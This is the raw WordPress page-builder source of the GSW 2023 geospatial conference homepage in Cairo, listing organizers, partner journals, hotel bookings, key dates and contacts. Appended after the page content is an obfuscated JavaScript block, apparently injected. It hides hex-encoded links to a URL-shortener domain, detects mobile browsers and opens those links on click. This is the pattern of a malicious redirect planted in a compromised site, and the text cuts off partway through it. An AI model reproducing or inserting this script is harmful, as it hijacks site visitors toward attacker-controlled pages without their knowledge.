organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 